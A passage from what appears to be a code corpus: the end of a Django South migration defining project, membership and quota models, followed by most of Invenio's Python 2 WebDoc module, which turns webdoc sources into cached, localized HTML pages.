'members': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['im.AstakosUser']", 'through': "orm['im.ProjectMembership']", 'symmetrical': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80', 'unique': 'True', 'null': 'True', 'db_index': 'True'}),
'state': ('django.db.models.fields.IntegerField', [], {'default': '1', 'db_index': 'True'})
},
'im.projectapplication': {
'Meta': {'unique_together': "(('chain', 'id'),)", 'object_name': 'ProjectApplication'},
'applicant': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'projects_applied'", 'to': "orm['im.AstakosUser']"}),
'chain': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'chained_apps'", 'db_column': "'chain'", 'to': "orm['im.Project']"}),
'comments': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'end_date': ('django.db.models.fields.DateTimeField', [], {}),
'homepage': ('django.db.models.fields.URLField', [], {'max_length': '255', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issue_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'limit_on_members_number': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True'}),
'member_join_policy': ('django.db.models.fields.IntegerField', [], {}),
'member_leave_policy': ('django.db.models.fields.IntegerField', [], {}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'projects_owned'", 'to': "orm['im.AstakosUser']"}),
'resource_grants': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['im.Resource']", 'null': 'True', 'through': "orm['im.ProjectResourceGrant']", 'blank': 'True'}),
'response': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'response_actor': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'responded_apps'", 'null': 'True', 'to': "orm['im.AstakosUser']"}),
'response_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'start_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'state': ('django.db.models.fields.IntegerField', [], {'default': '0', 'db_index': 'True'}),
'waive_actor': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'waived_apps'", 'null': 'True', 'to': "orm['im.AstakosUser']"}),
'waive_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'waive_reason': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
},
'im.projectlock': {
'Meta': {'object_name': 'ProjectLock'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'im.projectlog': {
'Meta': {'object_name': 'ProjectLog'},
'actor': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.AstakosUser']", 'null': 'True'}),
'comments': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'date': ('django.db.models.fields.DateTimeField', [], {}),
'from_state': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'log'", 'to': "orm['im.Project']"}),
'reason': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'to_state': ('django.db.models.fields.IntegerField', [], {})
},
'im.projectmembership': {
'Meta': {'unique_together': "(('person', 'project'),)", 'object_name': 'ProjectMembership'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.AstakosUser']"}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.Project']"}),
'state': ('django.db.models.fields.IntegerField', [], {'default': '0', 'db_index': 'True'})
},
'im.projectmembershiplog': {
'Meta': {'object_name': 'ProjectMembershipLog'},
'actor': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.AstakosUser']", 'null': 'True'}),
'comments': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'date': ('django.db.models.fields.DateTimeField', [], {}),
'from_state': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'membership': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'log'", 'to': "orm['im.ProjectMembership']"}),
'reason': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'to_state': ('django.db.models.fields.IntegerField', [], {})
},
'im.projectresourcegrant': {
'Meta': {'unique_together': "(('resource', 'project_application'),)", 'object_name': 'ProjectResourceGrant'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'member_capacity': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'project_application': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.ProjectApplication']", 'null': 'True'}),
'project_capacity': ('django.db.models.fields.BigIntegerField', [], {'null': 'True'}),
'resource': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.Resource']"})
},
'im.resource': {
'Meta': {'object_name': 'Resource'},
'api_visible': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'desc': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'service_origin': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'service_type': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'ui_visible': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'unit': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'uplimit': ('django.db.models.fields.BigIntegerField', [], {'default': '0'})
},
'im.service': {
'Meta': {'object_name': 'Service'},
'component': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.Component']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'im.sessioncatalog': {
'Meta': {'object_name': 'SessionCatalog'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'session_key': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sessions'", 'null': 'True', 'to': "orm['im.AstakosUser']"})
},
'im.usersetting': {
'Meta': {'unique_together': "(('user', 'setting'),)", 'object_name': 'UserSetting'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'setting': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['im.AstakosUser']"}),
'value': ('django.db.models.fields.IntegerField', [], {})
},
'quotaholder_app.commission': {
'Meta': {'object_name': 'Commission'},
'clientkey': ('django.db.models.fields.CharField', [], {'max_length': '4096'}),
'issue_datetime': ('django.db.models.fields.DateTimeField', [], {}),
'name': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '4096'}),
'serial': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'quotaholder_app.holding': {
'Meta': {'unique_together': "(('holder', 'source', 'resource'),)", 'object_name': 'Holding'},
'holder': ('django.db.models.fields.CharField', [], {'max_length': '4096', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'limit': ('django.db.models.fields.BigIntegerField', [], {}),
'resource': ('django.db.models.fields.CharField', [], {'max_length': '4096'}),
'source': ('django.db.models.fields.CharField', [], {'max_length': '4096', 'null': 'True'}),
'usage_max': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'usage_min': ('django.db.models.fields.BigIntegerField', [], {'default': '0'})
},
'quotaholder_app.provision': {
'Meta': {'object_name': 'Provision'},
'holder': ('django.db.models.fields.CharField', [], {'max_length': '4096', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'quantity': ('django.db.models.fields.BigIntegerField', [], {}),
'resource': ('django.db.models.fields.CharField', [], {'max_length': '4096'}),
'serial': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'provisions'", 'to': "orm['quotaholder_app.Commission']"}),
'source': ('django.db.models.fields.CharField', [], {'max_length': '4096', 'null': 'True'})
},
'quotaholder_app.provisionlog': {
'Meta': {'object_name': 'ProvisionLog'},
'delta_quantity': ('django.db.models.fields.BigIntegerField', [], {}),
'holder': ('django.db.models.fields.CharField', [], {'max_length': '4096'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issue_time': ('django.db.models.fields.CharField', [], {'max_length': '4096'}),
'limit': ('django.db.models.fields.BigIntegerField', [], {}),
'log_time': ('django.db.models.fields.CharField', [], {'max_length': '4096'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '4096'}),
'reason': ('django.db.models.fields.CharField', [], {'max_length': '4096'}),
'resource': ('django.db.models.fields.CharField', [], {'max_length': '4096'}),
'serial': ('django.db.models.fields.BigIntegerField', [], {}),
'source': ('django.db.models.fields.CharField', [], {'max_length': '4096', 'null': 'True'}),
'usage_max': ('django.db.models.fields.BigIntegerField', [], {}),
'usage_min': ('django.db.models.fields.BigIntegerField', [], {})
}
}
complete_apps = ['im', 'quotaholder_app']
symmetrical = True
| gpl-3.0 |
pamfilos/invenio | modules/webstyle/lib/webdoc.py | 16 | 36364 | # -*- coding: utf-8 -*-
## This file is part of Invenio.
## Copyright (C) 2007, 2008, 2009, 2010, 2011 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""
WebDoc -- Transform webdoc sources into static html files
"""
__revision__ = \
"$Id$"
from invenio.config import \
CFG_PREFIX, \
CFG_SITE_LANG, \
CFG_SITE_LANGS, \
CFG_SITE_NAME, \
CFG_SITE_SUPPORT_EMAIL, \
CFG_SITE_ADMIN_EMAIL, \
CFG_SITE_URL, \
CFG_SITE_SECURE_URL, \
CFG_SITE_RECORD, \
CFG_VERSION, \
CFG_SITE_NAME_INTL, \
CFG_CACHEDIR
from invenio.dateutils import \
convert_datestruct_to_datetext, \
convert_datestruct_to_dategui, \
convert_datecvs_to_datestruct
from invenio.shellutils import mymkdir
from invenio.messages import \
gettext_set_language, \
wash_language, \
language_list_long
import re
import getopt
import os
import sys
import time
# List of (webdoc_source_dir, webdoc_cache_dir)
webdoc_dirs = {'help':('%s/lib/webdoc/invenio/help' % CFG_PREFIX, \
'%s/webdoc/help-pages' % CFG_CACHEDIR),
'admin':('%s/lib/webdoc/invenio/admin' % CFG_PREFIX, \
'%s/webdoc/admin-pages' % CFG_CACHEDIR),
'hacking':('%s/lib/webdoc/invenio/hacking' % CFG_PREFIX, \
'%s/webdoc/hacking-pages' % CFG_CACHEDIR),
'info':('%s/lib/webdoc/invenio/info' % CFG_PREFIX, \
'%s/webdoc/info-pages' % CFG_CACHEDIR)}
# Regular expression for finding text to be translated
translation_pattern = re.compile(r'_\((?P<word>.*?)\)_', \
re.IGNORECASE | re.DOTALL | re.VERBOSE)
# Regular expression for finding comments
comments_pattern = re.compile(r'^\s*#.*$', \
re.MULTILINE)
# Regular expression for finding <lang:current/> tag
pattern_lang_current = re.compile(r'<lang \s*:\s*current\s*\s*/>', \
re.IGNORECASE | re.DOTALL | re.VERBOSE)
# Regular expression for finding <lang:link/> tag
pattern_lang_link_current = re.compile(r'<lang \s*:\s*link\s*\s*/>', \
re.IGNORECASE | re.DOTALL | re.VERBOSE)
# Regular expression for finding <!-- %s: %s --> tag
# where %s will be replaced at run time
pattern_tag = r'''
<!--\s*(?P<tag>%s) #<!-- %%s tag (no matter case)
\s*:\s*
(?P<value>.*?) #description value. any char that is not end tag
(\s*-->) #end tag
'''
# List of available tags in webdoc, and the pattern to find it
pattern_tags = {'WebDoc-Page-Title': '',
'WebDoc-Page-Navtrail': '',
'WebDoc-Page-Description': '',
'WebDoc-Page-Keywords': '',
'WebDoc-Page-Header-Add': '',
'WebDoc-Page-Box-Left-Top-Add': '',
'WebDoc-Page-Box-Left-Bottom-Add': '',
'WebDoc-Page-Box-Right-Top-Add': '',
'WebDoc-Page-Box-Right-Bottom-Add': '',
'WebDoc-Page-Footer-Add': '',
'WebDoc-Page-Revision': ''
}
for tag in pattern_tags.keys():
pattern_tags[tag] = re.compile(pattern_tag % tag, \
re.IGNORECASE | re.DOTALL | re.VERBOSE)
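As a hedged, self-contained illustration of what the compiled patterns above match, here is the 'WebDoc-Page-Title' case with the `pattern_tag` template inlined (a sketch only; it re-declares the pattern locally instead of reusing the module-level `pattern_tags` dict):

```python
import re

# Same shape as the pattern_tag template above, inlined for one tag.
demo_pattern = re.compile(r'''
    <!--\s*(?P<tag>WebDoc-Page-Title)   # <!-- tag (case-insensitive)
    \s*:\s*
    (?P<value>.*?)                      # the tag value (lazy)
    (\s*-->)                            # end of the HTML comment
    ''', re.IGNORECASE | re.DOTALL | re.VERBOSE)

demo_match = demo_pattern.search('<!-- WebDoc-Page-Title: My Title -->')
# demo_match.group('value') is 'My Title'
```

The lazy `(?P<value>.*?)` plus the trailing `(\s*-->)` group is what lets the value stop cleanly before the closing `-->`, without capturing the padding whitespace.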
# Regular expression for finding <lang>...</lang> tag
pattern_lang = re.compile(r'''
<lang #<lang tag (no matter case)
\s*
(?P<keep>keep=all)*
\s* #any number of white spaces
> #closing <lang> start tag
(?P<langs>.*?) #anything but the next group (greedy)
(</lang\s*>) #end tag
''', re.IGNORECASE | re.DOTALL | re.VERBOSE)
# Regular expression for finding <en>...</en> tag (particular case of
# pattern_lang)
pattern_CFG_SITE_LANG = re.compile(r"<("+CFG_SITE_LANG+ \
r")\s*>(.*?)(</"+CFG_SITE_LANG+r"\s*>)",
re.IGNORECASE | re.DOTALL)
# Builds regular expression for finding each known language in <lang> tags
ln_pattern_text = r"<(?P<lang>"
ln_pattern_text += r"|".join([lang[0] for lang in \
language_list_long(enabled_langs_only=False)])
ln_pattern_text += r')\s*(revision="[^"]*"\s*)?>(?P<translation>.*?)</\1>'
ln_pattern = re.compile(ln_pattern_text, re.IGNORECASE | re.DOTALL)
defined_tags = {'<CFG_SITE_NAME>': CFG_SITE_NAME,
'<CFG_SITE_SUPPORT_EMAIL>': CFG_SITE_SUPPORT_EMAIL,
'<CFG_SITE_ADMIN_EMAIL>': CFG_SITE_ADMIN_EMAIL,
'<CFG_SITE_URL>': CFG_SITE_URL,
'<CFG_SITE_SECURE_URL>': CFG_SITE_SECURE_URL,
'<CFG_SITE_RECORD>': CFG_SITE_RECORD,
'<CFG_VERSION>': CFG_VERSION,
'<CFG_SITE_NAME_INTL>': CFG_SITE_NAME_INTL}
def get_webdoc_parts(webdoc,
parts=['title', \
'keywords', \
'navtrail', \
'body',
'lastupdated',
'description'],
categ="",
update_cache_mode=1,
ln=CFG_SITE_LANG,
verbose=0,
req=None):
"""
Returns the html of the specified 'webdoc' part(s).
Also updates the cache if 'update_cache_mode' is 1 or 2.
Parameters:
webdoc - *string* the name of a webdoc that can be
found in standard webdoc dir, or a webdoc
filepath. Priority is given to filepath if
both match.
parts - *list(string)* the parts that should be
returned by this function. Can be in:
'title', 'keywords', 'navtrail', 'body',
'description', 'lastupdated'.
categ - *string* (optional) The category to which
the webdoc file belongs. 'help', 'admin'
or 'hacking'. If "", look in all categories.
update_cache_mode - *int* update the cached version of the
given 'webdoc':
- 0 : do not update
- 1 : update if needed
- 2 : always update
Returns : *dictionary* with keys being in 'parts' input parameter and values
being the corresponding html part.
"""
html_parts = {}
if update_cache_mode in [1, 2]:
update_webdoc_cache(webdoc, update_cache_mode, verbose)
def get_webdoc_cached_part_path(webdoc_cache_dir, webdoc, ln, part):
"Build path for given webdoc, ln and part"
return webdoc_cache_dir + os.sep + webdoc + \
os.sep + webdoc + '.' + part + '-' + \
ln + '.html'
for part in parts:
if categ != "":
if categ == 'info':
uri_parts = req.uri.split(os.sep)
locations = list(webdoc_dirs.get(categ, ('','')))
locations[0] = locations[0] + os.sep + os.sep.join(uri_parts[uri_parts.index('info')+1:-1])
locations = [tuple(locations)]
else:
locations = [webdoc_dirs.get(categ, ('',''))]
else:
locations = webdoc_dirs.values()
for (_webdoc_source_dir, _web_doc_cache_dir) in locations:
webdoc_cached_part_path = None
if os.path.exists(get_webdoc_cached_part_path(_web_doc_cache_dir,
webdoc, ln, part)):
# Check given language
webdoc_cached_part_path = get_webdoc_cached_part_path(_web_doc_cache_dir, webdoc, ln, part)
elif os.path.exists(get_webdoc_cached_part_path(_web_doc_cache_dir, webdoc, CFG_SITE_LANG, part)):
# Check CFG_SITE_LANG
webdoc_cached_part_path = get_webdoc_cached_part_path(_web_doc_cache_dir, webdoc, CFG_SITE_LANG, part)
elif os.path.exists(get_webdoc_cached_part_path(_web_doc_cache_dir, webdoc, 'en', part)):
# Check English
webdoc_cached_part_path = get_webdoc_cached_part_path(_web_doc_cache_dir, webdoc, 'en', part)
if webdoc_cached_part_path is not None:
try:
webdoc_cached_part = file(webdoc_cached_part_path, 'r').read()
html_parts[part] = webdoc_cached_part
except IOError:
# Could not read cache file. Generate on-the-fly,
# get all the parts at the same time, and return
(webdoc_source_path, \
webdoc_cache_dir, \
webdoc_name,\
webdoc_source_modification_date, \
webdoc_cache_modification_date) = get_webdoc_info(webdoc)
webdoc_source = file(webdoc_source_path, 'r').read()
htmls = transform(webdoc_source, languages=[ln])
if len(htmls) > 0:
(lang, body, title, keywords, \
navtrail, lastupdated, description) = htmls[-1]
html_parts = {'body': body or '',
'title': title or '',
'keywords': keywords or '',
'navtrail': navtrail or '',
'lastupdated': lastupdated or '',
'description': description or ''}
# We then have all the parts, or there is no
# translation for this file (if len(htmls)==0)
break
else:
# Look in other categories
continue
if html_parts == {}:
# Could not find/read the folder where cache should
# be. Generate on-the-fly, get all the parts at the
# same time, and return
dirs = None
if categ == "info":
dirs = locations
(webdoc_source_path, \
webdoc_cache_dir, \
webdoc_name,\
webdoc_source_modification_date, \
webdoc_cache_modification_date) = get_webdoc_info(webdoc, dirs=dirs)
if webdoc_source_path is not None:
try:
webdoc_source = file(webdoc_source_path, 'r').read()
htmls = transform(webdoc_source, languages=[ln])
if len(htmls) > 0:
(lang, body, title, keywords, \
navtrail, lastupdated, description) = htmls[-1]
html_parts = {'body': body or '',
'title': title or '',
'keywords': keywords or '',
'navtrail': navtrail or '',
'lastupdated': lastupdated or '',
'description': description or ''}
# We then have all the parts, or there is no
# translation for this file (if len(htmls)==0)
break
except IOError:
# Nothing we can do..
pass
return html_parts
def update_webdoc_cache(webdoc, mode=1, verbose=0, languages=CFG_SITE_LANGS):
"""
Update the cache (on disk) of the given webdoc.
Parameters:
webdoc - *string* the name of a webdoc that can be
found in standard webdoc dir, or a webdoc
filepath.
mode - *int* update cache mode:
- 0 : do not update
- 1 : only if necessary (webdoc source
is newer than its cache)
- 2 : always update
"""
if mode in [1, 2]:
(webdoc_source_path, \
webdoc_cache_dir, \
webdoc_name,\
webdoc_source_modification_date, \
webdoc_cache_modification_date) = get_webdoc_info(webdoc)
if mode == 1 and \
webdoc_source_modification_date < webdoc_cache_modification_date and \
get_mo_last_modification() < webdoc_cache_modification_date:
# Cache was updated after source. No need to update
return
(webdoc_source, \
webdoc_cache_dir, \
webdoc_name) = read_webdoc_source(webdoc)
if webdoc_source is not None:
htmls = transform(webdoc_source, languages=languages)
for (lang, body, title, keywords, \
navtrail, lastupdated, description) in htmls:
# Body
if body is not None or lang == CFG_SITE_LANG:
try:
write_cache_file('%(name)s.body%(lang)s.html' % \
{'name': webdoc_name,
'lang': '-'+lang},
webdoc_cache_dir,
body,
verbose)
except IOError, e:
print e
except OSError, e:
print e
# Title
if title is not None or lang == CFG_SITE_LANG:
try:
write_cache_file('%(name)s.title%(lang)s.html' % \
{'name': webdoc_name,
'lang': '-'+lang},
webdoc_cache_dir,
title,
verbose)
except IOError, e:
print e
except OSError, e:
print e
# Keywords
if keywords is not None or lang == CFG_SITE_LANG:
try:
write_cache_file('%(name)s.keywords%(lang)s.html' % \
{'name': webdoc_name,
'lang': '-'+lang},
webdoc_cache_dir,
keywords,
verbose)
except IOError, e:
print e
except OSError, e:
print e
# Navtrail
if navtrail is not None or lang == CFG_SITE_LANG:
try:
write_cache_file('%(name)s.navtrail%(lang)s.html' % \
{'name': webdoc_name,
'lang': '-'+lang},
webdoc_cache_dir,
navtrail,
verbose)
except IOError, e:
print e
except OSError, e:
print e
# Description
if description is not None or lang == CFG_SITE_LANG:
try:
write_cache_file('%(name)s.description%(lang)s.html' % \
{'name': webdoc_name,
'lang': '-'+lang},
webdoc_cache_dir,
description,
verbose)
except IOError, e:
print e
except OSError, e:
print e
# Last updated timestamp (CVS timestamp)
if lastupdated is not None or lang == CFG_SITE_LANG:
try:
write_cache_file('%(name)s.lastupdated%(lang)s.html' % \
{'name': webdoc_name,
'lang': '-'+lang},
webdoc_cache_dir,
lastupdated,
verbose)
except IOError, e:
print e
except OSError, e:
print e
# Last updated cache file
try:
write_cache_file('last_updated',
webdoc_cache_dir,
convert_datestruct_to_dategui(time.localtime()),
verbose=0)
except IOError, e:
print e
except OSError, e:
print e
if verbose > 0:
print 'Written cache in %s' % webdoc_cache_dir
def read_webdoc_source(webdoc):
"""
Returns the source of the given webdoc, along with the path to its
cache directory.
Returns (None, None, None) if webdoc cannot be found.
Parameters:
webdoc - *string* the name of a webdoc that can be
found in standard webdoc dir, or a webdoc
filepath. Priority is given to filepath if
both match.
Returns: *tuple* (webdoc_source, webdoc_cache_dir, webdoc_name)
"""
(webdoc_source_path, \
webdoc_cache_dir, \
webdoc_name,\
webdoc_source_modification_date, \
webdoc_cache_modification_date) = get_webdoc_info(webdoc)
if webdoc_source_path is not None:
try:
webdoc_source = file(webdoc_source_path, 'r').read()
except IOError:
webdoc_source = None
else:
webdoc_source = None
return (webdoc_source, webdoc_cache_dir, webdoc_name)
def get_webdoc_info(webdoc, dirs=None):
"""
Locate the file corresponding to given webdoc and return its
path, the path to its cache directory (even if it does not exist
yet), the last modification dates of the source and the cache, and
the webdoc name (i.e. webdoc id)
Parameters:
webdoc - *string* the name of a webdoc that can be found in
standard webdoc dirs. (Without extension '.webdoc',
hence 'search-guide', not 'search-guide.webdoc'.)
Returns: *tuple* (webdoc_source_path, webdoc_cache_dir,
webdoc_name, webdoc_source_modification_date,
webdoc_cache_modification_date)
"""
webdoc_source_path = None
webdoc_cache_dir = None
webdoc_name = None
last_updated_date = None
webdoc_source_modification_date = 1
webdoc_cache_modification_date = 0
locations = webdoc_dirs.values()
if dirs is not None:
locations = dirs
for (_webdoc_source_dir, _web_doc_cache_dir) in locations:
webdoc_source_path = _webdoc_source_dir + os.sep + \
webdoc + '.webdoc'
if os.path.exists(webdoc_source_path):
webdoc_cache_dir = _web_doc_cache_dir + os.sep + webdoc
webdoc_name = webdoc
webdoc_source_modification_date = os.stat(webdoc_source_path).st_mtime
break
else:
webdoc_source_path = None
webdoc_name = None
webdoc_source_modification_date = 1
if webdoc_cache_dir is not None and \
os.path.exists(webdoc_cache_dir + os.sep + 'last_updated'):
webdoc_cache_modification_date = os.stat(webdoc_cache_dir + \
os.sep + \
'last_updated').st_mtime
return (webdoc_source_path, webdoc_cache_dir, webdoc_name,
webdoc_source_modification_date, webdoc_cache_modification_date)
def get_webdoc_topics(sort_by='name', sc=0, limit=-1,
categ=['help', 'admin', 'hacking'],
ln=CFG_SITE_LANG):
"""
List the available webdoc files in html format.
sort_by - *string* Sort topics by 'name' or 'date'.
sc - *int* Split the topics by categories if sc=1.
limit - *int* Max number of topics to be printed.
No limit if limit < 0.
categ - *list(string)* the categories to consider
ln - *string* Language of the page
"""
_ = gettext_set_language(ln)
topics = {}
ln_link = '?ln=' + ln
for category in categ:
if not webdoc_dirs.has_key(category):
continue
(source_path, cache_path) = webdoc_dirs[category]
if not topics.has_key(category):
topics[category] = []
# Build list of tuples(webdoc_name, webdoc_date, webdoc_url)
for webdocfile in [path for path in \
os.listdir(source_path) \
if path.endswith('.webdoc')]:
webdoc_name = webdocfile[:-7]
webdoc_url = CFG_SITE_URL + "/help/" + \
((category != 'help' and category + '/') or '') + \
webdoc_name
try:
webdoc_date = time.strptime(get_webdoc_parts(webdoc_name,
parts=['lastupdated']).get('lastupdated', "1970-01-01 00:00:00"),
"%Y-%m-%d %H:%M:%S")
except:
webdoc_date = time.strptime("1970-01-01 00:00:00", "%Y-%m-%d %H:%M:%S")
topics[category].append((webdoc_name, webdoc_date, webdoc_url))
# If not split by category, merge everything
if sc == 0:
all_topics = []
for topic in topics.values():
all_topics.extend(topic)
topics.clear()
topics[''] = all_topics
# Sort topics
if sort_by == 'name':
for topic in topics.values():
topic.sort()
elif sort_by == 'date':
for topic in topics.values():
topic.sort(lambda x, y:cmp(x[1], y[1]))
topic.reverse()
out = ''
for category, topic in topics.iteritems():
if category != '' and len(categ) > 1:
out += '<strong>'+ _("%(category)s Pages") % \
{'category': _(category).capitalize()} + '</strong>'
if limit < 0:
limit = len(topic)
out += '<ul><li>' + \
'</li><li>'.join(['%s <a href="%s%s">%s</a>' % \
((sort_by == 'date' and time.strftime('%Y-%m-%d', topic_item[1])) or '', \
topic_item[2], \
ln_link, \
get_webdoc_parts(topic_item[0], \
parts=['title'], \
ln=ln).get('title', '')) \
for topic_item in topic[:limit]]) + \
'</li></ul>'
return out
def transform(webdoc_source, verbose=0, req=None, languages=CFG_SITE_LANGS):
"""
Transform a WebDoc into html
This is done through a series of transformations, mainly substitutions.
Parameters:
- webdoc_source : *string* the WebDoc input to transform to HTML
"""
parameters = {} # Will store values for specified parameters, such
# as 'Title' for <!-- WebDoc-Page-Title: Title -->
def get_param_and_remove(match):
"""
Analyses 'match', get the parameter and return empty string to
remove it.
Called by substitution in 'transform(...)', used to collect
parameters such as <!-- WebDoc-Page-Title: Title -->
@param match: a match object corresponding to the special tag
that must be interpreted
"""
tag = match.group("tag")
value = match.group("value")
parameters[tag] = value
return ''
def translate(match):
"""
Translate matching values
"""
word = match.group("word")
translated_word = _(word)
return translated_word
# 1 step
## First filter, used to remove comments
## and <protect> tags
uncommented_webdoc = ''
for line in webdoc_source.splitlines(True):
if not line.strip().startswith('#'):
uncommented_webdoc += line
webdoc_source = uncommented_webdoc.replace('<protect>', '')
webdoc_source = webdoc_source.replace('</protect>', '')
html_texts = {}
# Language dependent filters
for ln in languages:
_ = gettext_set_language(ln)
# Check if translation is really needed
## Just a quick check. Might trigger false negatives, but that is
## ok.
if ln != CFG_SITE_LANG and \
translation_pattern.search(webdoc_source) is None and \
pattern_lang_link_current.search(webdoc_source) is None and \
pattern_lang_current.search(webdoc_source) is None and \
'<%s>' % ln not in webdoc_source and \
('_(') not in webdoc_source:
continue
# 2 step
## Filter used to translate string in _(..)_
localized_webdoc = translation_pattern.sub(translate, webdoc_source)
# 3 step
## Print current language 'en', 'fr', .. instead of
## <lang:current /> tags and '?ln=en', '?ln=fr', .. instead of
## <lang:link />
localized_webdoc = pattern_lang_link_current.sub('?ln=' + ln,
localized_webdoc)
localized_webdoc = pattern_lang_current.sub(ln, localized_webdoc)
# 4 step
## Filter out languages
localized_webdoc = filter_languages(localized_webdoc, ln, defined_tags)
# 5 step
## Replace defined tags with their value from config file
## Eg. replace <CFG_SITE_URL> with 'http://cds.cern.ch/':
for defined_tag, value in defined_tags.iteritems():
if defined_tag.upper() == '<CFG_SITE_NAME_INTL>':
localized_webdoc = localized_webdoc.replace(defined_tag, \
value.get(ln, value['en']))
else:
localized_webdoc = localized_webdoc.replace(defined_tag, value)
# 6 step
## Get the parameters defined in HTML comments, like
## <!-- WebDoc-Page-Title: My Title -->
localized_body = localized_webdoc
for tag, pattern in pattern_tags.iteritems():
localized_body = pattern.sub(get_param_and_remove, localized_body)
out = localized_body
# Pre-process date
last_updated = parameters.get('WebDoc-Page-Revision', '')
last_updated = convert_datecvs_to_datestruct(last_updated)
last_updated = convert_datestruct_to_datetext(last_updated)
html_texts[ln] = (ln,
out,
parameters.get('WebDoc-Page-Title'),
parameters.get('WebDoc-Page-Keywords'),
parameters.get('WebDoc-Page-Navtrail'),
last_updated,
parameters.get('WebDoc-Page-Description'))
# Remove duplicates
filtered_html_texts = []
if html_texts.has_key(CFG_SITE_LANG):
filtered_html_texts = [(html_text[0], \
(html_text[1] != html_texts[CFG_SITE_LANG][1] and html_text[1]) or None, \
(html_text[2] != html_texts[CFG_SITE_LANG][2] and html_text[2]) or None, \
(html_text[3] != html_texts[CFG_SITE_LANG][3] and html_text[3]) or None, \
(html_text[4] != html_texts[CFG_SITE_LANG][4] and html_text[4]) or None, \
(html_text[5] != html_texts[CFG_SITE_LANG][5] and html_text[5]) or None, \
(html_text[6] != html_texts[CFG_SITE_LANG][6] and html_text[6]) or None)
for html_text in html_texts.values() \
if html_text[0] != CFG_SITE_LANG]
filtered_html_texts.append(html_texts[CFG_SITE_LANG])
else:
filtered_html_texts = html_texts.values()
return filtered_html_texts
def write_cache_file(filename, webdoc_cache_dir, filebody, verbose=0):
"""Write a file inside WebDoc cache dir.
Raise an exception if not possible
"""
# open file:
mymkdir(webdoc_cache_dir)
fullfilename = webdoc_cache_dir + os.sep + filename
if filebody is None:
filebody = ''
os.umask(022)
f = open(fullfilename, "w")
f.write(filebody)
